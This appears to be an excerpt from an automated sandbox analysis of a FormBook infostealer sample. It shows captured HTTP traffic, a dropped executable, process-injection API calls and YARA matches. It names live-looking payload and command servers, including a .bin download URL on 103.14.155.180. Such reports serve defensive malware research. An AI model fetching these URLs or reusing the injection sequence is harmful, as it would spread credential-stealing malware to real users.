2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:18:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin.
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin3c
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.binO
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/It3
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/NTIFIER=Intel64
        Source: Untapestried.exe, 00000007.00000002.2158641488.000000000475D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.14.155.180/i
        Source: cmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M
        Source: 160420241245287.exe, Untapestried.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eternalsunrise.xyz
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eternalsunrise.xyz/9pdo/
        Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBqq
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: cmd.exe, 0000000C.00000003.2329977830.0000000007C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Untapestried.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03144340 NtSetContextThread,LdrInitializeThunk,12_2_03144340
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03144650 NtSuspendThread,LdrInitializeThunk,12_2_03144650
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142B60 NtClose,LdrInitializeThunk,12_2_03142B60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142AD0 NtReadFile,LdrInitializeThunk,12_2_03142AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142AF0 NtWriteFile,LdrInitializeThunk,12_2_03142AF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142F30 NtCreateSection,LdrInitializeThunk,12_2_03142F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142FB0 NtResumeThread,LdrInitializeThunk,12_2_03142FB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142FE0 NtCreateFile,LdrInitializeThunk,12_2_03142FE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03142EE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03142D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03142D30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142DD0 NtDelayExecution,LdrInitializeThunk,12_2_03142DD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03142DF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03142C70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142C60 NtCreateKey,LdrInitializeThunk,12_2_03142C60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03142CA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031435C0 NtCreateMutant,LdrInitializeThunk,12_2_031435C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031439B0 NtGetContextThread,LdrInitializeThunk,12_2_031439B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142B80 NtQueryInformationFile,12_2_03142B80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142BA0 NtEnumerateValueKey,12_2_03142BA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142BF0 NtAllocateVirtualMemory,12_2_03142BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142BE0 NtQueryValueKey,12_2_03142BE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142AB0 NtWaitForSingleObject,12_2_03142AB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142F60 NtCreateProcessEx,12_2_03142F60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142F90 NtProtectVirtualMemory,12_2_03142F90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142FA0 NtQuerySection,12_2_03142FA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142E30 NtWriteVirtualMemory,12_2_03142E30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142E80 NtReadVirtualMemory,12_2_03142E80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142EA0 NtAdjustPrivilegesToken,12_2_03142EA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142D00 NtSetInformationFile,12_2_03142D00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142DB0 NtEnumerateKey,12_2_03142DB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142C00 NtQueryInformationProcess,12_2_03142C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142CC0 NtQueryVirtualMemory,12_2_03142CC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142CF0 NtOpenProcess,12_2_03142CF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143010 NtOpenDirectoryObject,12_2_03143010
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143090 NtSetValueKey,12_2_03143090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143D10 NtOpenProcessToken,12_2_03143D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143D70 NtOpenThread,12_2_03143D70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857730 NtCreateFile,12_2_02857730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857A10 NtClose,12_2_02857A10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857890 NtReadFile,12_2_02857890
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857970 NtDeleteFile,12_2_02857970
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_0040335A
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00404B100_2_00404B10
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_0040653F0_2_0040653F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BDF1081_2_04BDF108
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BDF9D81_2_04BDF9D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BDEDC01_2_04BDEDC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CA35212_2_031CA352
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E3F012_2_0311E3F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D03E612_2_031D03E6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B027412_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031902C012_2_031902C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AA11812_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310010012_2_03100100
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0319815812_2_03198158
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D01AA12_2_031D01AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C41A212_2_031C41A2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C81CC12_2_031C81CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A200012_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313475012_2_03134750
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311077012_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310C7C012_2_0310C7C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312C6E012_2_0312C6E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311053512_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D059112_2_031D0591
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B442012_2_031B4420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C244612_2_031C2446
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BE4F612_2_031BE4F6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CAB4012_2_031CAB40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C6BD712_2_031C6BD7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA8012_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312696212_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A012_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031DA9A612_2_031DA9A6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311A84012_2_0311A840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311284012_2_03112840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F68B812_2_030F68B8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E8F012_2_0313E8F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03130F3012_2_03130F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B2F3012_2_031B2F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03152F2812_2_03152F28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03184F4012_2_03184F40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318EFA012_2_0318EFA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102FC812_2_03102FC8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CEE2612_2_031CEE26
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110E5912_2_03110E59
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122E9012_2_03122E90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CCE9312_2_031CCE93
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CEEDB12_2_031CEEDB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031ACD1F12_2_031ACD1F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311AD0012_2_0311AD00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03128DBF12_2_03128DBF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310ADE012_2_0310ADE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110C0012_2_03110C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0CB512_2_031B0CB5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100CF212_2_03100CF2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C132D12_2_031C132D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FD34C12_2_030FD34C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0315739A12_2_0315739A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031152A012_2_031152A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312B2C012_2_0312B2C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312D2F012_2_0312D2F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B12ED12_2_031B12ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031DB16B12_2_031DB16B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314516C12_2_0314516C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FF17212_2_030FF172
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311B1B012_2_0311B1B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031170C012_2_031170C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BF0CC12_2_031BF0CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C70E912_2_031C70E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CF0E012_2_031CF0E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CF7B012_2_031CF7B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0315563012_2_03155630
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C16CC12_2_031C16CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C757112_2_031C7571
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AD5B012_2_031AD5B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D95C312_2_031D95C3
